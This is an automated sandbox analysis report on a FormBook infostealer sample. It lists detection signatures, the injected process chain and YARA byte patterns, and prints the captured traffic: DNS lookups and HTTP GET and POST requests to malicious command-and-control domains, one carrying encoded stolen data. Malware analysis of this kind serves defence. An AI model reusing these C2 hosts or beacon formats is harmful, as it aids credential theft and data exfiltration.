
Windows Analysis Report
PO2024033194.exe

Overview

General Information

Sample name: PO2024033194.exe
Analysis ID: 1515416
MD5: 1eebf0360b466749cd46f9d7971c35cd
SHA1: 563fe4fd1b3ff569adfe99ad15791e78a09c486f
SHA256: 59965600d8885fbd982a88ecf800b6a8cf6714fff11fcbe5123a7fc72781cf23
Tags: exe, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PO2024033194.exe (PID: 5032 cmdline: "C:\Users\user\Desktop\PO2024033194.exe" MD5: 1EEBF0360B466749CD46F9D7971C35CD)
    • svchost.exe (PID: 3492 cmdline: "C:\Users\user\Desktop\PO2024033194.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • drBzjAnGBElC.exe (PID: 4508 cmdline: "C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • replace.exe (PID: 5168 cmdline: "C:\Windows\SysWOW64\replace.exe" MD5: A7F2E9DD9DE1396B1250F413DA2F6C08)
          • firefox.exe (PID: 6080 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source / Rule / Description / Author / Strings
Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2bd50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13e1f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source / Rule / Description / Author / Strings
Source: 2.2.svchost.exe.390000.0.raw.unpack; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 2.2.svchost.exe.390000.0.raw.unpack; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2f1f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x172c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 2.2.svchost.exe.390000.0.unpack; Rule: JoeSecurity_FormBook_1; Description: Yara detected FormBook; Author: Joe Security
Source: 2.2.svchost.exe.390000.0.unpack; Rule: Windows_Trojan_Formbook_1112e116; Description: unknown; Author: unknown
  • 0x2e3f3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x164c2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ParentImage: C:\Users\user\Desktop\PO2024033194.exe, ParentProcessId: 5032, ParentProcessName: PO2024033194.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ProcessId: 3492, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine: "C:\Users\user\Desktop\PO2024033194.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ParentImage: C:\Users\user\Desktop\PO2024033194.exe, ParentProcessId: 5032, ParentProcessName: PO2024033194.exe, ProcessCommandLine: "C:\Users\user\Desktop\PO2024033194.exe", ProcessId: 3492, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: PO2024033194.exe; Avira: detected
Source: PO2024033194.exe; ReversingLabs: Detection: 68%
Source: Yara match; File source: 2.2.svchost.exe.390000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 2.2.svchost.exe.390000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000002.00000002.2276204113.0000000007B60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4625601742.0000000003720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2272045176.0000000000390000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4618007061.0000000003220000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4633344393.00000000081D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000003.00000002.4625749476.00000000034C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000002.4625644692.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000002.00000002.2272674512.0000000003F50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: PO2024033194.exe; Joe Sandbox ML: detected
Source: PO2024033194.exe; Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: replace.pdb source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: replace.pdbGCTL source: svchost.exe, 00000002.00000002.2272256633.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2240619932.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, drBzjAnGBElC.exe, 00000003.00000003.2210655063.0000000000FDB000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: drBzjAnGBElC.exe, 00000003.00000000.2188627925.0000000000B7E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PO2024033194.exe, 00000000.00000003.2152209643.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PO2024033194.exe, 00000000.00000003.2153477802.00000000045D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2171329849.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2272324167.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2173389213.0000000003000000.00000004.00000020.00020000.00000000.sdmp, replace.exe, replace.exe, 00000004.00000002.4625999539.0000000003C1E000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2272345888.000000000372B000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.4625999539.0000000003A80000.00000040.00001000.00020000.00000000.sdmp, replace.exe, 00000004.00000003.2274426157.00000000038D6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: drBzjAnGBElC.exe, 00000003.00000002.4631661117.0000000005D9C000.00000004.80000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4626763608.00000000040AC000.00000004.10000000.00040000.00000000.sdmp, replace.exe, 00000004.00000002.4619808862.0000000003370000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.2571131599.0000000021F5C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00452492
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00442886
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_004788BD
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,0_2_004339B6
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,0_2_0045CAFA
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00431A86
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0044BD27 _wcscat,_wcscat,__wsplitpath,FindFirstFileW,CopyFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,0_2_0044BD27
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0045DE8F FindFirstFileW,FindClose,0_2_0045DE8F
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_0044BF8B _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0044BF8B
Source: C:\Windows\SysWOW64\replace.exe; Code function: 4_2_0323C230 FindFirstFileW,FindNextFileW,FindClose,4_2_0323C230
Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; Code function: 4x nop then xor eax, eax 3_2_081E8D0F
Source: C:\Program Files (x86)\IZUFLznHCkNZbtPOFzMiFukFwZBsFMtqfCvGuaODWSA\drBzjAnGBElC.exe; Code function: 4x nop then pop edi 3_2_081E37FB
Source: C:\Windows\SysWOW64\replace.exe; Code function: 4x nop then xor eax, eax 4_2_03229AD0
Source: C:\Windows\SysWOW64\replace.exe; Code function: 4x nop then mov ebx, 00000004h 4_2_038704E8

Networking

Source: DNS query: www.moritynomxd.xyz
Source: DNS query: www.sterkus.xyz
Source: DNS query: www.rtpngk.xyz
Source: Joe Sandbox View; IP Address: 84.32.84.32
Source: Joe Sandbox View; IP Address: 81.2.196.19
Source: Joe Sandbox View; ASN Name: MULTIBAND-NEWHOPEUS
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\PO2024033194.exe; Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,0_2_004422FE
            Source: global trafficHTTP traffic detected: GET /v5tr/?azq=fdKL&i4fTbV=rKvRMuVKXCO914EMf6FJZqs15EwODFtrZQGlCKKDXZs+G4DSdFL+ryYGM1VkNXNOLhPAbMSex0AuWObt4o/1nDXQn1hUK94ec9ohCtOvtuL7AUDvHPFr4eFDSQ4dByebKLhAxCA= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.moritynomxd.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kmgk/?i4fTbV=QukKnG46OQSX7O08sGKvg3RM3X3qAaYvhEJu7ZdGlt3+bssdK2PjljbXjRv2eFs2wJoIh8oMTDRJEFcKnARzbSkEG7C+S10TVNl/lUZQUcXG1s/qSHsJxTh0IeDSHLWw9C3219A=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.kovallo.cloudUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /becc/?azq=fdKL&i4fTbV=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq+0r9zHfOkYA3BHmcUXc8X+6X2iixUCsZsuiX+6YOVLq03j5m1rIFAvnCnNucMsmrQXs06QWDt4JmjDj2SCXWkqqyO9GVL4EIVQqM= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sppsuperplast.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /fl4z/?i4fTbV=jN3KkN8xc9fseqtyr4X8nJfH94tzQs+avQjwnfoXfZkRaIXL2JZC0r1JTtOX041q/8MEGRSGOm2xSpEpVpIzWI1c8aHKB84aW/ayFZO6Ci7mHGUqbMIqCZW2CzRbEoWsVZM2Mt4=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.tracy.clubUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ha8h/?i4fTbV=PbxAaK8rSTbGZ+BUjIA4k1uuUYM0d40nW5ERHNgbkCm+3sg74DzBCze1WsCQlDZBoOF+IY6Xn812UFXfTFX61WMZ5CKSP5Ywj/pBJKYAqDUZeWyiIAYv47gxX4Wz9AjmXGPf0TM=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.sterkus.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /xx1z/?i4fTbV=VQ273Por9tZNXcpnBjHyerHfPh3IuY3S8eL22/fuso5dBdPYMoEWGed6+bFxO5C9LYS/pyvuVKWKURQ6ZaqIbgLD3FdOqThfipJSMpop8XT73tgOJX/evlBfZJqpsucjatnH3Ic=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.syncnodex.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /lbpf/?azq=fdKL&i4fTbV=M+DfsBvEIkyOAb10y0dA+UDjYbUtqrwEKADScmdz2U7nr/YOsALJT64KSPaG4zh33A22H+qXr8/USoZXKjK96Mq7ReyrRgsD03neHbuXRNiEyhMf3k5eUDWFdm02mW+aOnIw8Rk= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.galaxyslot88rtp.latUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /kzas/?i4fTbV=rYHw3+wcZ3MA1g8BlTjgV3gIUSr9tyXK9S6FoLDJmOPSIdlvtrqwrkb5B8iquLWNvXCfhDtVKXWhlby4MVAaDngcwMeGi/BoYEcvXov5p8XDmTcGsyLNqscLVebXffIjoHEY6dk=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.warriorsyndrome.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /uxh9/?azq=fdKL&i4fTbV=ws/IawdEHaoWNg/j/7Jh7udGjrT+7JNe46jOTwFB35qywQtlsi2lBgTXskhK1RztBb48nT9+3zT3nLR+G4pW/TQl73NUqeHNXHH3PGvVImUF6XMIr31PtOcnQw0qsh/RRwu87bI= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.ks1x7i.vipUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /ml5l/?i4fTbV=q39FRlrjXh2BAZ2an0Y0b+wnoW9u3vRxeQ2ev9PxWnLSwGTc53vym4zMKhd+m8E/J85vcAPus+7jLKqTLJL7gZ0oLWeUJsJ7Z2tBEY1sQX9lUVfuGDuLcfeu3lFclf66FPfUGcc=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.pakmartcentral.shopUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /74ou/?i4fTbV=3mmMrs1mHi0xtqaDMxx5sGmAfYwz3fKeAP6hfCImDXgoS2DvTlMdmK0EBclDVq+276a7o9Kf0aGsTEl5XVQUxBF2OIg1GqwvGg+sN+gOtZPXTMPeHtLoUfm2FHWRrzdI/h6GADA=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.les-massage.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /876i/?i4fTbV=Kmyw+GmuH5iWde8Ln9Oic9mBBukDH7X+neEL39Fbw9B5TSRbsYx5ep9OaSlRgrfJ9t7osQY2p6mHYTWDA9JvWsELiS8f9ArZa8bqi05RWv7nbhrshbpVBxpFhG8DfoS8KPtDMCA=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.rtpngk.xyzUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /i557/?azq=fdKL&i4fTbV=r5xTDTq+P/dmGc23aTYP++6vD4IIXl1qT9Awk095V47k3JGT99IqetoKvxAOeL2EPogdFWvWqA7DbFw7qeor8ymW97eZJYTdZjDdM43a/Prut01z/AyWNItbEAzthb57mHY0hv0= HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.wcq24.topUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /4hfb/?i4fTbV=p0fiPEbR7h0D1ZUOfVsjdEWFV3Vqdd7ztt+ba1ipU50QpLeGbsfhVX/xlcry6cJcaLbXkWa/uL73QIBTv0okvOs18q2MWzQBAuyEy9gJ3iqXHcMZDpxJS19wj2EcV+2vhba8AVQ=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.cc101.proUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /bf6k/?i4fTbV=WmuOVz+RC0WxuKvAKjLazsuJSut05UnIYH9cvZCoa2K6/WBiXNRHwXvjS8aBoIFx3RUgrEeQYXBh1DGCvEwoQM3mycAsC54rxjYGxDtBM8eA6E3stZW6KS9LpBS51Lfr66nx40w=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.asociacia.onlineUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
            Source: global trafficHTTP traffic detected: GET /1y6y/?i4fTbV=ZZCwzVqBWU3muJHN1dgNLIPJNXd9yQEIX/09mdB9zFH2Ray8HotAqN5avWZULpURoYhjfm8F2pVR91tny4xaJPUX7ORaydK2UjqrNVAqXuTNZBGKwung4T5z6qUZC9ci/NR8GrU=&azq=fdKL HTTP/1.1Accept: */*Accept-Language: en-US,enConnection: closeHost: www.deefbank.netUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)
Source: global traffic; DNS traffic detected: DNS query: www.moritynomxd.xyz
Source: global traffic; DNS traffic detected: DNS query: www.kovallo.cloud
Source: global traffic; DNS traffic detected: DNS query: www.sppsuperplast.online
Source: global traffic; DNS traffic detected: DNS query: www.tracy.club
Source: global traffic; DNS traffic detected: DNS query: www.sterkus.xyz
Source: global traffic; DNS traffic detected: DNS query: www.syncnodex.net
Source: global traffic; DNS traffic detected: DNS query: www.galaxyslot88rtp.lat
Source: global traffic; DNS traffic detected: DNS query: www.warriorsyndrome.net
Source: global traffic; DNS traffic detected: DNS query: www.ks1x7i.vip
Source: global traffic; DNS traffic detected: DNS query: www.pakmartcentral.shop
Source: global traffic; DNS traffic detected: DNS query: www.les-massage.online
Source: global traffic; DNS traffic detected: DNS query: www.rtpngk.xyz
Source: global traffic; DNS traffic detected: DNS query: www.wcq24.top
Source: global traffic; DNS traffic detected: DNS query: www.cc101.pro
Source: global traffic; DNS traffic detected: DNS query: www.asociacia.online
Source: global traffic; DNS traffic detected: DNS query: www.deefbank.net
            Source: unknownHTTP traffic detected: POST /kmgk/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,enConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 211Cache-Control: no-cacheHost: www.kovallo.cloudOrigin: http://www.kovallo.cloudReferer: http://www.kovallo.cloud/kmgk/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0E; .NET4.0C)Data Raw: 69 34 66 54 62 56 3d 64 73 4d 71 6b 78 78 6d 51 6a 2b 56 39 65 34 37 6a 47 43 55 6f 31 68 65 35 7a 33 65 47 6f 30 79 6a 56 42 77 38 63 64 74 33 71 4c 7a 62 2f 63 7a 66 6e 72 38 70 44 7a 73 70 67 61 57 5a 51 4d 45 30 4d 77 71 68 62 30 4d 45 6a 64 66 43 41 30 5a 6c 33 70 47 65 6a 6f 50 43 5a 48 79 5a 56 4e 33 47 64 67 7a 34 57 73 4d 43 72 65 6e 2b 35 43 76 42 58 31 75 6f 68 52 56 5a 76 4b 70 4a 50 2f 49 2f 52 6a 55 74 72 76 79 70 78 4e 4b 79 46 69 7a 41 4f 52 62 69 39 64 63 6f 58 68 4b 63 6a 61 49 42 45 6f 34 53 50 70 4f 44 4b 58 68 45 6e 68 4d 78 35 74 68 43 61 63 51 37 6e 2f 73 6a 44 55 30 2b 31 54 73 71 5a 51 73 35 71 6f 55 Data Ascii: i4fTbV=dsMqkxxmQj+V9e47jGCUo1he5z3eGo0yjVBw8cdt3qLzb/czfnr8pDzspgaWZQME0Mwqhb0MEjdfCA0Zl3pGejoPCZHyZVN3Gdgz4WsMCren+5CvBX1uohRVZvKpJP/I/RjUtrvypxNKyFizAORbi9dcoXhKcjaIBEo4SPpODKXhEnhMx5thCacQ7n/sjDU0+1TsqZQs5qoU
            Source: global traffic
            HTTP traffic detected: HTTP/1.1 404 Not Found
            Server: nginx/1.14.1
            Date: Sun, 22 Sep 2024 15:41:41 GMT
            Content-Length: 0
            Connection: close
            X-Rate-Limit-Limit: 5s
            X-Rate-Limit-Remaining: 19
            X-Rate-Limit-Reset: 2024-09-22T15:41:46.7226135Z
